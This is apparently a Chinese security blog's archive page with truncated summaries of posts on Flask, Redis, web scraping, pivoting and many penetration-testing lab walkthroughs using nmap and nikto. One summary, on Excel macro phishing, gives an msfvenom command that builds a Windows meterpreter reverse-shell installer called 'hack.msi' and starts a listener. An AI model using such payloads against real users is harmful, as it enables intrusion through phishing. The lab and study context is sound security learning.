04 2022 档案
摘要:Windows内网和域的介绍 一般是企业的Windows server 基本概念 **工作组:**work group,一种资源管理方式 ping计算机名和ping IP效果差不多,虽然是ipv6地址 域:Domain **域控制器:**Domain Controller(DC),对于多台主机进行管
阅读全文
摘要:pivoting跳板攻击和自动路由 黑客(192.168.223.131) ——(192.168.223.180)server1(172.16.214.129)——(172.16.214.128)Server2 pivoting跳板攻击 把入侵主机当作路由器,利用被入侵主机作为跳板,攻击内网其他主机
阅读全文
摘要:redis部署 nosql系列 redis服务安装 wget http://download.redis.io/releases/redis-4.0.9.tar.gz tar zxvf redis-4.0.9.tar.gz mv ./redis-4.0.9 /usr/local/redis cd /
阅读全文
摘要:excel宏钓鱼 生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f msi -o hack.msi 开始监听 msfconsole use exploit/multi/handle
阅读全文
摘要:网络模式理解 Vmnet1和Vmnet2 在虚拟网络编辑器中有Vmnet1和Vmnet2,他们的区别为:网络模式不同、服务器不同、访问不同 网络模式不同 **Vmnet1:**Vmnet1采用的网络模式是Host-Only网络模式。 **Vmnet8:**Vmnet8采用的网络模式是NAT网络模式。
阅读全文
摘要:前言 虚拟网络计算(VNC)是一种连接系统,使您可以使用键盘和鼠标与远程服务器上的图形桌面环境进行交互。 对于尚不熟悉命令行的用户,它使在远程服务器上管理文件,软件和设置更加容易,本人在配置VNC时也踩了很多坑,最后终于配好了环境,将过程写下来 正文 首先进入root权限,安装Xfce桌面环境 ka
阅读全文
摘要:base64 import base64 def main(): s = "haha123" bs = base64.b64encode(s.encode('utf-8')) print(bs) //b'aGFoYTEyMw==' print(bs.decode('utf-8')) # aGFoYT
阅读全文
摘要:ICMP scapy基本操作 前期准备 在Linux中使用pycharm进行接下来的操作,以便帮我们实现网络底层功能 去pycharm官网下载pycharm的Linux版本 https://www.jetbrains.com/pycharm/download/#section=linux 将pych
阅读全文
摘要:前言 一直在学习python,也听过flask和爬虫的知识,但是自己一直没有完整的写一个出来,前段时间和朋友交流说到这个问题,发现不能再拖了,应该要有所突破,不然这种学习只是记笔记而已,没有实操还是不行,所以结合之前的flask教程,通过前端POST数据和MySQL数据库交互写了一个登录框,晚辈学艺
阅读全文
摘要:表单处理 main.py @app.route('/chuli', methods=['POST']) def chuli(): if request.method == 'POST': # uname和passwd是前端的name字段里的字符 username = request.form.get
阅读全文
摘要:支持html返回 @app.route('/a') def a_page(): return Response('<h1>haha nihao</h1>' '<br><hr>' '<h2>ddddd</h2>', 200) 模板使用 调用模板 在templates文件下新建一个HTML 5 file
阅读全文
摘要:前置设置 在settings中的Manage Repositories修改python源为douban:https://pypi.douban.com/simple/ ,并下载flask包 flask基本设置 **flask:**python轻量级web框架,自己本身就是一个中间件,借助操作系统安装
阅读全文
摘要:03.图像处理 在setting中设置导入pillow库 前置知识 **RGB颜色:**3个颜色通道组成的颜色 **3个颜色:**红(255,0,0)、绿(0,255,0)、蓝(0,0,255) **其他常见:**黄(255,255,0) 一个像素(pixel)=3字节 做实验的两张图如下,分别为k
阅读全文
摘要:和python进行互动 安装redis库 pip3 install redis 连接数据库 import redis # StrictRedis和Redis效果一样,后者是前者的子集 r = redis.StrictRedis(host='localhost',port=6379,db=0) r.s
阅读全文
摘要:Redis 介绍 NoSQL类型数据库之一,内存运行,效率极高,支持分布式,理论上可以无限拓展数据库,支持各种语言的API,可安装在各种平台 关系型数据库:MySQL、SQLServer、Oracle 非关系型数据库:NoSQL、Redis(key-value) 特点: c/s通信模式(Client
阅读全文
摘要:同时采集多个字段 items.py import scrapy class Test1Item(scrapy.Item): # define the fields for your item here like: # name = scrapy.Field() # 在items定义数据类型 titl
阅读全文
摘要:模拟手机操作 # 引入触控类 from selenium.webdriver.common.touch_actions import TouchActions mobileEmulation = {'deviceName':'iPhone 6/7/8'} options = webdriver.Ch
阅读全文
摘要:cookie操作 # 查看cookie cookie = driver.get_cookies() print(cookie) # 增加cookie driver.add_cookie({'name':'xiaoming','key':'9988'}) # 清除所有cookie driver.del
阅读全文
摘要:拖拽操作 # 拖拽操作 first_target = driver.find_element_by_xpath("//span[contains(text(),'喜羊羊与灰太狼之决战次时代')]") second_target = driver.find_element_by_xpath("//a[
阅读全文
摘要:selenium电脑模式和手机模式 # 指定调用某个地方的chrome options = webdriver.ChromeOptions() # chrome浏览器的主程序位置 location = r"F:\All_python_code\scrapy\chrome-win\chrome.exe
阅读全文
摘要:xpath 处理网页:pip install lxml from lxml import etree # 网页的源码 html_doc = resp.content.decode('utf-8') # 使用etree去转换html_doc,转换成了一个html对象,此时element对象可以使用xp
阅读全文
摘要:Json 在线数据生成器:https://www.onlinedatagenerator.com/ 加载json数据 import requests import json # from pprint import pprint def main(): url = "http://192.168.2
阅读全文
摘要:爬虫实验 简单的爬取网页源代码 import requests def main(): url = "http://www.4399dmw.com/search/dh-1-0-0-0-0-{}-0/" url_list = [] headers = { "User-Agent": "User-Age
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.175 通过arp-scan -l获取目标IP为192.168.223.175,nmap扫描一下,开放80端口, nmap -p- -A 192.168.223.175 nikto扫描一下,发现robots.txt,在里
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.174 通过arp-scan -l获取目标IP为192.168.223.174,nmap扫描一下,只开放22和80端口,80端口只是一张图片 nmap -p- -A 192.168.223.174 nikto扫一下 ni
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.173 通过arp-scan -l获取目标IP为192.168.223.173,nmap扫描一下,只开放了8080端口,是个http服务,进去后没啥东西 nmap -p- -A 192.168.223.173 nikto
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.172 通过arp-scan -l获取目标IP为192.168.223.172,nmap扫描一下,发现开启21、22、80端口 nmap -p- -A 192.168.223.172 没东西出现,nikto扫一下 nik
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.171 通过arp-scan -l获取目标IP为192.168.223.171,nmap扫描一下,开放22、80、111、39682端口 nmap -p- -A 192.168.223.171 看一眼网页,是单页博客,使
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.170 通过arp-scan -l获取目标IP为192.168.223.170,nmap扫描一下,发现只开启了80端口 nmap -p- -A 192.168.223.170 是一个模拟的黑客网站,使用nikto扫描 n
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.169 通过arp-scan -l扫描到目标IP为192.168.223.169先扫描一下目标 nmap -T4 -A -v 192.168.223.169 发现开启21号ftp端口,用的是ProFTPD 1.3.3c,
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.168 通过arp-scan扫出ip为192.168.223.168,再通过nmap扫描 nmap -sV 192.168.223.168 通过nmap扫描,发现开放22、80,其中139和445都是Samba服务器,3
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.167 通过arp-scan扫出ip为192.168.223.167,再通过nmap扫描 nmap -sV 192.168.223.167 发现开启了22,80,31337端口,其中80端口和31337都是http服务;
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.164 通过arp-scan扫出ip为192.168.223.164,再通过nmap扫描 nmap -p- 192.168.223.164 -A 扫出21(FTP)、22(SSH)、1337、7331(HTTP),每个都
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.161 首先确定目标IP为192.168.223.161 arp-scan -l nmap扫描开放端口,发现开启22(SSH)、80(HTTP) //查看是否存活 nmap -sP 192.168.223.161 //主
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.160 首先确定目标IP为192.168.223.160 arp-scan -l nmap扫描开放端口,发现开启22(SSH)、80(HTTP) //查看是否存活 nmap -sP 192.168.223.160 //主
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.159 首先确定目标IP为192.168.223.159 arp-scan -l nmap扫描开放端口,发现开启80、111和51343端口 nmap -T4 -A 192.168.223.159 -p 1-65535
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.158 首先确定目标IP为192.168.223.158 arp-scan -l nmap扫描开放端口,发现开启22和80端口 nmap -T4 -A 192.168.223.158 -p 1-65535 进入网站是一个
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.157 首先确定目标IP为192.168.223.157 arp-scan -l nmap扫描开放端口,发现只开放了80 nmap -T4 -A 192.168.223.157 -p 1-65535 whatweb判断网
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.156 首先确定目标IP为192.168.223.156 arp-scan -l nmap探测主机是否存活,存活才能开始接下来的扫描 nmap -T4 -sP 192.168.223.156 -T4:针对TCP端口禁止动
阅读全文
摘要:kali:192.168.223.131 target:192.168.223.155 由于放在同一个虚拟机下默认在内网,但DC系列没有告诉我们IP地址,需要扫一下 arp-scan -l 发现IP地址为192.168.223.155,之后nmap扫描端口 nmap -sV -p- 192.168.
阅读全文